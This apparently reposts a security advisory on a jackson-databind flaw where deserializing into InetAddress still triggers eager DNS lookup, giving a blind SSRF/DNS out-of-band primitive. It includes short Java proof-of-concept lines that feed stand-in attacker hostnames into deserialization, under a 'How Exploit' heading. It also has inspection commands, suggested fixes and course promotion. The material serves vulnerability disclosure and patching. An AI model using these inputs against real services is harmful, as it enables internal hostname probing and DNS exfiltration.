Listen to this Post
CVE-2026-54514 (GHSA-hgj6-7826-r7m5) fixed an eager-DNS-resolution / SSRF issue in jackson-databind deserialization of java.net.InetSocketAddress.
The fix switched the InetSocketAddress branch to InetSocketAddress.createUnresolved(…).
PR 5951, commit 1f5a1037, released in 2.18.8 / 2.21.4 / 3.1.4.
That fix did not cover the sibling java.net.InetAddress branch in the same FromStringDeserializer.Std._deserialize() switch statement.
The InetAddress branch still calls InetAddress.getByName(value).
This performs an eager forward DNS lookup on attacker-controlled input at deserialization time.
Any value deserialized into an InetAddress-typed target reaches InetAddress.getByName(attackerControlledString).
A plain POJO field, polymorphic subtype, or default-typing-permitted slot can reach it.
It invokes the OS/JVM resolver and performs forward DNS resolution before any application validation.
InetAddress is a registered standard string-like scalar type.
FromStringDeserializer.types() line 73 registers it.
findDeserializer() maps it to STD_INET_ADDRESS at line 119-120.
The parent fix’s own added unit test asserts address.isUnresolved().
The comment says “should NOT resolve address”.
This confirms DNS resolution during deserialization is the behavior treated as the vulnerability.
The InetAddress branch still violates that property.
Verified against the fixed released artifact jackson-databind 2.18.8 from Maven Central.
Decompiled bytecode shows the InetSocketAddress branch routes through _inetSocketAddress -> createUnresolved.
InetAddress.getByName is still emitted unchanged in the InetAddress branch.
PoC is lab-only, zero network egress.
A custom JDK InetAddressResolver SPI (Java 18+) counts forward lookups locally.
It answers with loopback, so no traffic leaves the host.
InetSocketAddress patched: 0 resolver lookups, isUnresolved=true.
InetAddress unpatched sibling: 1 resolver lookup on the attacker host.
Observed output: [bash] InetSocketAddress isUnresolved=true resolverLookups=0 lastHost=null.
Observed output: [bash] InetAddress value=localhost/127.0.0.1 resolverLookups=1 lastHost=internal-metadata.attacker-oob.example.
A standalone variant using an RFC-6761 .invalid canary host shows the same.
Deserializing into InetAddress raises UnknownHostException because the OS resolver was invoked.
InetSocketAddress stays unresolved.
Reachability with a plain field: static class Config { public InetAddress bindHost; public int port; }.
mapper.readValue(“{\”bindHost\”:\”poc-reach.example\”,\”port\”:1}”, Config.class).
Resolver invoked on “poc-reach.example”.
Impact: DNS-based SSRF / OOB primitive, out-of-band exfiltration / interaction via DNS callbacks, and blind probing of internal hostnames.
Same impact class and trust boundary as CVE-2026-54514 (CVSS 5.3, CWE-918).
It is a DNS-lookup / blind SSRF primitive, not arbitrary HTTP SSRF or RCE.
It does not itself open a socket.
Suggested fix: avoid eager resolution for InetAddress as well.
Defer resolution, validate the host string before resolving, or provide opt-in/opt-out consistent with the InetSocketAddress fix.
There is no direct unresolved-InetAddress equivalent.
Credit: Ta Duc Thien.
DailyCVE Form:
Platform: jackson-databind
Version: 2.18.8, 2.21.4, 3.1.4
Vulnerability: InetAddress eager DNS
Severity: Medium (CVSS 5.3)
date: 2026-05-05
Prediction: Patch date unknown
(end of form)
What Undercode Say:
Analytics
grep -n “STD_INET_ADDRESS” src/main/java/com/fasterxml/jackson/databind/deser/std/FromStringDeserializer.java
sed -n ‘350,385p’ src/main/java/com/fasterxml/jackson/databind/deser/std/FromStringDeserializer.java
sed -n ‘490,500p’ src/main/java/com/fasterxml/jackson/databind/deser/std/FromStringDeserializer.java
git show 1f5a1037
git log –oneline –all –grep=’5951′
mvn dependency:get -Dartifact=com.fasterxml.jackson.core:jackson-databind:2.18.8
javap -c -p target/classes/com/fasterxml/jackson/databind/deser/std/FromStringDeserializer.class
ObjectMapper m = new ObjectMapper();
m.readValue(“\”internal-metadata.attacker-oob.example:8080\””, InetSocketAddress.class);
m.readValue(“\”internal-metadata.attacker-oob.example\””, InetAddress.class);
static class Config { public InetAddress bindHost; public int port; }
mapper.readValue(“{\”bindHost\”:\”poc-reach.example\”,\”port\”:1}”, Config.class);
How Exploit: (Educational Purposes!)
ObjectMapper m = new ObjectMapper();
m.readValue(“\”internal-metadata.attacker-oob.example\””, InetAddress.class);
static class Config { public InetAddress bindHost; public int port; }
mapper.readValue(“{\”bindHost\”:\”poc-reach.example\”,\”port\”:1}”, Config.class);
Protection: from this CVE
Avoid eager resolution for InetAddress.
Defer resolution, validate host string before resolving.
Provide opt-in/opt-out consistent with InetSocketAddress fix.
No direct unresolved-InetAddress equivalent exists.
Document resolution or validate before use.
Impact:
DNS-based SSRF / OOB primitive.
Out-of-band exfiltration / interaction via DNS callbacks.
Blind probing of internal hostnames.
Same impact class as CVE-2026-54514 (CVSS 5.3, CWE-918).
Not arbitrary HTTP SSRF or RCE.
Does not itself open a socket.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

